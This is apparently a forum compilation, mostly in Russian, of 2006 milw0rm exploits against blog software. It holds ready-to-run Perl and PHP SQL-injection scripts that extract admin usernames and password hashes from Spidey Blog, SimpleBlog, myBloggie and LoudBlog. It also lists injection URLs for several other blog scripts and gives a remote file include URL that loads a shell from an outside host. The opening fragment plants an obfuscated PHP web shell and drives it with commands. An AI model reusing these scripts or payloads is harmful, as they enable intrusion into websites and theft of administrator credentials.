chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74); $shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69); $shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65); $shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54); $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D); $shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A); eval($shcode); die(); //']; $ua->request($re); while(<STDIN>){ chomp($cmd = $_); if($cmd eq 'exit') { exit(0); } $re = GET $host.$path.'include/variables.php?cmd='.$cmd; $res = $ua->request($re); print STDOUT "\n\n".$res->content."\n\$sh: "; } } else { $re = GET $host.$path.'insere_base.php?login=woot&pass=t00w'; $ua->request($re); print STDOUT "[+] Admin login.: woot\n"; print STDOUT "[+] Admin passwd: t00w\n"; print STDOUT '+', '-' x 60, "+\n"; } # milw0rm.com [2006-09-27] A-Blog V2 Remote File Include Code: http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php? Spidey Blog Script <= 1.5 SQL Injection PHP: #!usr/bin/perl #Author : gega #Google : "Spidey Blog Script (c) v1.5" #SpideyBlog 1.5 Sql Injection Exploit #Author Mail : gega.tr[at]gmail[dot]com #Powered by e-hack.org #Vulnerability by Asianeagle. #Vulnerability Link : http://milw0rm.com/exploits/2186 use LWP::Simple; print "\n==============================\n"; print "== Spidey Blog v1.5 ==\n"; print "== Sql Injection Exploit ==\n"; print "== Author : gega ==\n"; print "==============================\n\n"; if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick')) { print "Usage : perl $0 [path] [function]\n"; print "path ==> http://www.example.com/blog/\n"; print "function ==> nick OR password\n"; print "Example : perl $0 http://site.org/blog/ nick\n"; exit(0); } else { if($ARGV[1] eq 'nick'){ $url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201]; $page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $ARGV[0]\n"; $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n"; print "[-] Unable to retrieve username\n" if(!$1); } else { $code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201]; $page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!"; print "[+] Connected to: $ARGV[0]\n"; $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n"; print "[-] Unable to retrieve password\n" if(!$1); } } #To Be Or Not To Be! # milw0rm.com [2006-09-24]
xweblog <= 2.1 SQL Injection Code: http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler TualBLOG 1.0 SQL Injection Code: http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1 SimpleBlog <= 2.3 SQL Injection Code: http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 icblogger v2 SQL Injection Code: http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 Админка: SimpleBlog <= 2.0 SQL Injection PHP: #!/usr/bin/perl #Method found by Chironex Fleckeri #Exploit By ASIANEAGLE #Contact:[email protected] #Original advisory: http://www.milw0rm.com/exploits/2228 #Usage: exploitname.pl <host> <path> <id> use IO::Socket; if(@ARGV != 3) { usage(); } else { exploit(); } sub header() { print " *****SimpleBlog 2.0 SQL Injection Exploit***** \r\n"; print " *****www.asianeagle.org***** \r\n"; } sub usage() { header(); print " *Usage: $0 <host> <path> <id>\r\n"; print " *<host> = Victim's host ex: www.site.com\r\n"; print " *<path> = SimpleBlog Path ex: /SimpleBlog/\r\n"; print " *<id> = Admin ID ex: 1\r\n"; exit(); } sub exploit () { $simserver = $ARGV[0]; $simserver =~ s/(http:\/\/)//eg; $simhost = "http://".$simserver; $simdir = $ARGV[1]; $simport = "80"; $simtar = "comments.asp?id="; $simsql = "-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null%20FROM%20T_USERS%20WHERE%20id%20like%20".$ARGV[2]; $simreq = $simhost.$simdir.$simtar.$simsql; header(); print "- Trying to connect: $simserver\r\n"; $sim = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$simserver", PeerPort => "$simport") || die "- Connection failed...\n"; print $sim "GET $simreq HTTP/1.1\n"; print $sim "Accept: */*\n"; print $sim "Referer: $simhost\n"; print $sim "Accept-Language: tr\n"; print $sim "User-Agent: Mozzilla\n"; print $sim "Cache-Control: no-cache\n"; print $sim "Host: $simserver\n"; print $sim "Connection: close\n\n"; print "Connected...\r\n"; while ($answer = <$sim>) { if ($answer =~ /class=\"c_content\">(.*?)<\/td><\/tr>/) { if ($1 == $ARGV[2]) { print "Seems Vulnerable :)\r\n"; } else { die "- Exploit failed\n"; } } if ($answer =~ /class=\"c_content\"><b>(.*)<\/b>/) { print "- Username: $1\r\n"; } if ($answer =~ /href=\"mailto:(.*?)\">(.*?)<\/a>/) { print "- Password: $1\r\n"; } } } # milw0rm.com [2006-08-20] LBlog <= 1.05 SQL Injection Code: http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 Админка: SAPID Blog <= beta 2 Remote File Include myBloggie <= 2.1.4 Multiple SQL Injections PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n"; echo "administrative credentials disclosure exploit\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n\n"; /* works regardless of php.ini settings against MySQL >= 4.1 (allowing subs) */ if ($argc<3) { echo "Usage: php ".$argv[0]." host path OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo "path: path to MyBloggie\n"; echo "Options:\n"; echo " -i specify an existent post id (default: 1)\n"; echo " -T[prefix] specify a table prefix different from default (mb_)\n"; echo " -p[port]: specify a port other than 80\n"; echo " -P[ip:port]: specify a proxy\n"; echo " -d: disclose table prefix (reccomended)\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /MyBloggie/ -d -i7\r\n"; echo "php ".$argv[0]." localhost /MyBloggie/ -Tm_\r\n"; die; } /* software site: http://mybloggie.mywebland.com/ vulnerable code in trackback.php: ... if(!empty($_REQUEST['title'])) { $title=urldecode(substr($_REQUEST['title'],0,$tb_title_len)); } else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No title</p>"); } if(!empty($_REQUEST['url'])) { $url=urldecode($_REQUEST['url']); if (validate_url($url)==false) { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : URL not valid</p>"); } } else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No URL</p>"); } if(!empty($_REQUEST['excerpt'])) { $excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len)); } else { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : No Excerpt</p>"); } // The blog name if(!empty($_REQUEST['blog_name'])) { $blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len)); } else { $blog_name="No Blog Name"; } $timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(), $timezone ), gmtdate('s', time(), $timezone ), gmtdate('n', time(), $timezone ), gmtdate('d', time(), $timezone ), gmtdate('Y', time(), $timezone )); $sql = "INSERT INTO ".COMMENT_TBL." SET post_id='$tb_id', comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' , poster = '$blog_name', home='$url', comment_type='trackback'"; $result = $db->sql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); ... you have sql injection in 'title', 'url', 'excerpt' and 'blog_name' argument with MySQL >= 4.1 that allows SELECT subqueries for INSERT... so you can insert admin username & password hash inside comments and you will see them at screen also arguments are passed to urldecode(), so you can bypass magic_quotes_gpc with '%2527' sequence for the single quote char adn you can disclose table prefix going to: http://192.168.1.3/mybloggie/index.php?mode=viewdate you will have an error that disloses a query fragment - ex., injecting code in 'title' argument, query becomes: INSERT INTO mb_comment SET post_id='1', comment_subject='hi',comments=(SELECT CONCAT('<!--',password,'-->')FROM mb_user)/*', comments='whatever', com_tstamp='1154799697' , poster = 'whatever', home='http://www.suntzu.org', comment_type='trackback' */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } $host=$argv[1]; $path=$argv[2]; $port=80; $prefix="mb_"; $post_id="1";//admin $proxy=""; $dt=0; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } if ($temp=="-i") { $post_id=(int) str_replace("-i","",$argv[$i]); echo "post id -> ".$post_id."\n"; } if ($temp=="-d") { $dt=1; } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} if ($dt) { $packet ="GET ".$p."index.php?mode=viewdate HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"You have an error in your SQL syntax")) { $temp=explode("UNIXTIME(",$html); $temp2=explode("posts.timest",$temp[1]); $prefix=$temp2[0]; echo "table prefix -> ".$prefix."\n"; } } $sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,password,%2527-->%2527)FROM ".$prefix."user)/*"; //some problems with argument length, maybe with prefix > 3 chars you will have some error, cut the '<!--' but hash will be clearly visible in comments $data="title=hi".$sql; $data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg"; $data.="&excerpt=whatever"; $data.="&blog_name=whatever"; $packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $sql="%2527,comments=(SELECT CONCAT(%2527<!--%2527,user,%2527-->%2527)FROM ".$prefix."user)/*"; $data="title=hi".$sql; $data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg"; $data.="&excerpt=whatever"; $data.="&blog_name=whatever"; $packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); $packet ="GET ".$p."index.php?mode=viewid&post_id=$post_id HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); //echo $html; $temp=explode('"message"><!--',$html); for ($i=1; $i<count($temp); $i++) { $temp2=explode("-->",$temp[$i]); if (is_hash($temp2[0])) { $hash=$temp2[0]; $temp2=explode("-->",$temp[$i+1]); $admin=$temp2[0]; echo "----------------------------------------------------------------\n"; echo "admin -> ".$admin."\n"; echo "password (md5) -> ".$hash."\n"; echo "----------------------------------------------------------------\n"; die(); } } //if you are here... echo "exploit failed..."; ?> # milw0rm.com [2006-08-07] LoudBlog <= 0.5 SQL Injection / Admin Credentials Disclosure PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "a dork: \"Powered by LoudBlog\"\r\n\r\n"; /* works regardless of magic_quotes_gpc settings */ if ($argc<3) { echo "Usage: php ".$argv[0]." host path OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to LoudBlog\r\n"; echo "user/pass: you need an account\r\n"; echo "Options:\r\n"; echo " -T[prefix] specify a table prefix different from 'lb_'\r\n"; echo " -p[port]: specify a port other than 80\r\n"; echo " -P[ip:port]: specify a proxy\r\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /loudblog/ \r\n"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } $host=$argv[1]; $path=$argv[2]; $port=80; $prefix="lb_"; $proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $zeros=array(",0,0,0,0", //<- this the one I tested, may change in other versions ",0,0,0", ",0,0", ",0", ",0,0,0,0,0", ",0,0,0,0,0,0", ",0,0,0,0,0,0,0"); for ($i=0; $i<count($zeros); $i++) { $sql="'UNION/**/SELECT/**/0,0,CONCAT('*_u_*',nickname,'*_u_*'),'2005-03-29 16:32:42',0,0,0,0,0,0,CONCAT('*_p_*',password,'*_p_*'),0,0,0,0,0,0,0".$zeros[$i]."/**/FROM/**/".$prefix."authors/**/WHERE/**/id=1/*"; //debug //echo "sql -> ".$sql."\r\n"; $sql=urlencode($sql); $packet ="GET ".$p."index.php?id=$sql HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp=explode("*_p_*",$html); $hash=$temp[1]; if (is_hash($hash)) { echo "-------------------------------------------------------\r\n"; echo "password (md5) -> ".$hash."\r\n"; $temp=explode("*_u_*",$html); echo "admin -> ".$temp[1]."\r\n"; echo "-------------------------------------------------------\r\n"; die; } } //if you are here... echo "exploit failed..."; ?> # milw0rm.com [2006-07-21]
BLOG:CMS 4.2.1 BLOG:CMS v4.2.1 Раскрытие путей Уязвимой код: PHP: $this->formdata = array( 'id' => $blog?$blog->getID():$CONF['DefaultBlog'], 'query' => htmlspecialchars(getVar('query')), ); Уязвимый код: PHP: $_REQUEST = array_map("htmlentities", $_REQUEST); Активная XSS Уязвимость находиться в комментариях к блогу (Его записям).
